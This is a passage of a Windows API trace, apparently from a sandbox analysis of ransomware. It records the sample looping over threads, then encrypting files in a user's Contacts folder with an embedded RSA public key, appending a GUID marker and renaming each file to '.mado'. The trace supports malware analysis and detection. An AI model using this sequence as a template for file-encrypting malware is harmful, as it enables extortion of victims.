() returned 0x113da68 [0203.446] GetCurrentThreadId () returned 0x600 [0203.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.446] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.447] GetTickCount () returned 0x113da68 [0203.447] GetCurrentThreadId () returned 0x600 [0203.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.447] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.447] GetTickCount () returned 0x113da68 [0203.447] GetCurrentThreadId () returned 0x600 [0203.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.447] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.448] GetTickCount () returned 0x113da68 [0203.448] GetCurrentThreadId () returned 0x600 [0203.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.448] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.449] GetTickCount () returned 0x113da68 [0203.449] GetCurrentThreadId () returned 0x600 [0203.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.449] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.449] GetTickCount () returned 0x113da68 [0203.449] GetCurrentThreadId () returned 0x600 [0203.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.450] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.450] GetTickCount () returned 0x113da68 [0203.450] GetCurrentThreadId () returned 0x600 [0203.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.450] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.451] GetTickCount () returned 0x113da68 [0203.451] GetCurrentThreadId () returned 0x600 [0203.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.451] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.451] GetTickCount () returned 0x113da68 [0203.451] GetCurrentThreadId () returned 0x600 [0203.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.452] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.452] GetTickCount () returned 0x113da68 [0203.452] GetCurrentThreadId () returned 0x600 [0203.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.452] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.453] GetTickCount () returned 0x113da68 [0203.453] GetCurrentThreadId () returned 0x600 [0203.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.453] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.453] GetTickCount () returned 0x113da68 [0203.453] GetCurrentThreadId () returned 0x600 [0203.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.454] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.454] GetTickCount () returned 0x113da68 [0203.454] GetCurrentThreadId () returned 0x600 [0203.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.454] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.455] GetTickCount () returned 0x113da68 [0203.455] GetCurrentThreadId () returned 0x600 [0203.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.455] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.455] GetTickCount () returned 0x113da68 [0203.456] GetCurrentThreadId () returned 0x600 [0203.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.456] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.456] GetTickCount () returned 0x113da68 [0203.456] GetCurrentThreadId () returned 0x600 [0203.456] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.457] GetTickCount () returned 0x113da68 [0203.457] GetCurrentThreadId () returned 0x600 [0203.457] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.457] GetTickCount () returned 0x113da68 [0203.457] GetCurrentThreadId () returned 0x600 [0203.458] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.458] GetTickCount () returned 0x113da78 [0203.458] GetCurrentThreadId () returned 0x600 [0203.458] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.459] GetTickCount () returned 0x113da78 [0203.459] GetCurrentThreadId () returned 0x600 [0203.459] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.459] GetTickCount () returned 0x113da78 [0203.459] GetCurrentThreadId () returned 0x600 [0203.459] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.460] GetTickCount () returned 0x113da78 [0203.460] GetCurrentThreadId () returned 0x600 [0203.460] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.461] GetTickCount () returned 0x113da78 [0203.461] GetCurrentThreadId () returned 0x600 [0203.461] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.461] GetTickCount () returned 0x113da78 [0203.461] GetCurrentThreadId () returned 0x600 [0203.461] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.462] GetTickCount () returned 0x113da78 [0203.462] GetCurrentThreadId () returned 0x600 [0203.462] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.463] GetTickCount () returned 0x113da78 [0203.463] GetCurrentThreadId () returned 0x600 [0203.463] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.463] GetTickCount () returned 0x113da78 [0203.463] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.464] GetTickCount () returned 0x113da78 [0203.464] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.464] GetTickCount () returned 0x113da78 [0203.464] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.465] GetTickCount () returned 0x113da78 [0203.465] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.466] GetTickCount () returned 0x113da78 [0203.466] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.466] GetTickCount () returned 0x113da78 [0203.466] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.467] GetTickCount () returned 0x113da78 [0203.467] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.467] GetTickCount () returned 0x113da78 [0203.467] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.468] GetTickCount () returned 0x113da78 [0203.468] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.469] GetTickCount () returned 0x113da78 [0203.469] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.469] GetTickCount () returned 0x113da78 [0203.469] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.470] GetTickCount () returned 0x113da78 [0203.470] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.470] GetTickCount () returned 0x113da78 [0203.470] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.471] GetTickCount () returned 0x113da78 [0203.471] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.472] GetTickCount () returned 0x113da78 [0203.472] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.472] GetTickCount () returned 0x113da78 [0203.472] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.473] GetTickCount () returned 0x113da78 [0203.473] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.474] GetTickCount () returned 0x113da87 [0203.474] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.474] GetTickCount () returned 0x113da87 [0203.474] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.475] GetTickCount () returned 0x113da87 [0203.475] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.475] GetTickCount () returned 0x113da87 [0203.475] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.476] GetTickCount () returned 0x113da87 [0203.476] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.477] GetTickCount () returned 0x113da87 [0203.477] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.477] GetTickCount () returned 0x113da87 [0203.477] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.478] GetTickCount () returned 0x113da87 [0203.478] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.478] GetTickCount () returned 0x113da87 [0203.478] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.479] GetTickCount () returned 0x113da87 [0203.479] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.480] GetTickCount () returned 0x113da87 [0203.480] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.480] GetTickCount () returned 0x113da87 [0203.480] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.481] GetTickCount () returned 0x113da87 [0203.481] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.481] GetTickCount () returned 0x113da87 [0203.482] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.482] GetTickCount () returned 0x113da87 [0203.482] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.483] GetTickCount () returned 0x113da87 [0203.483] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.483] GetTickCount () returned 0x113da87 [0203.483] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.484] GetTickCount () returned 0x113da87 [0203.484] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.485] GetTickCount () returned 0x113da87 [0203.485] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.485] GetTickCount () returned 0x113da87 [0203.485] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.486] GetTickCount () returned 0x113da87 [0203.486] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.486] GetTickCount () returned 0x113da87 [0203.486] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.487] GetTickCount () returned 0x113da87 [0203.487] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.488] GetTickCount () returned 0x113da87 [0203.488] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.488] GetTickCount () returned 0x113da87 [0203.488] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.489] GetTickCount () returned 0x113da97 [0203.489] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.489] GetTickCount () returned 0x113da97 [0203.489] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.490] GetTickCount () returned 0x113da97 [0203.490] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.491] GetTickCount () returned 0x113da97 [0203.544] FreeLibrary (hLibModule=0x74eb0000) returned 1 [0203.544] QueryPerformanceCounter (in: lpPerformanceCount=0x39cefa4 | out: lpPerformanceCount=0x39cefa4*=12439247144) returned 1 [0203.553] GlobalMemoryStatus (in: lpBuffer=0x39cf414 | out: lpBuffer=0x39cf414) [0203.559] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.590] WriteFile (in: hFile=0x63c, lpBuffer=0x32b69d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x32b69d8*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.590] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.590] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.590] CloseHandle (hObject=0x63c) returned 1 [0203.591] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.mado")) returned 1 [0203.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb68 | out: hHeap=0x2c0000) returned 1 [0203.593] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0203.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0203.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.593] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=68382) returned 1 [0203.593] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.596] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.596] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.597] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0203.598] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.598] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.598] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.598] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.599] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.599] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.599] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.599] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.599] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.600] SetLastError (dwErrCode=0x0) [0203.600] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.601] GetLastError () returned 0x0 [0203.601] SetLastError (dwErrCode=0x0) [0203.602] GetLastError () returned 0x0 [0203.602] SetLastError (dwErrCode=0x0) [0203.602] GetLastError () returned 0x0 [0203.602] SetLastError (dwErrCode=0x0) [0203.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.602] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.602] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.602] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.602] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.602] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.603] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7c690 [0203.603] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.603] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.604] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.604] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.604] CloseHandle (hObject=0x63c) returned 1 [0203.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b80690 [0203.605] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.mado")) returned 1 [0203.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.606] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.607] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0203.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.607] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0203.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.607] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1171) returned 1 [0203.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.609] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.610] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, 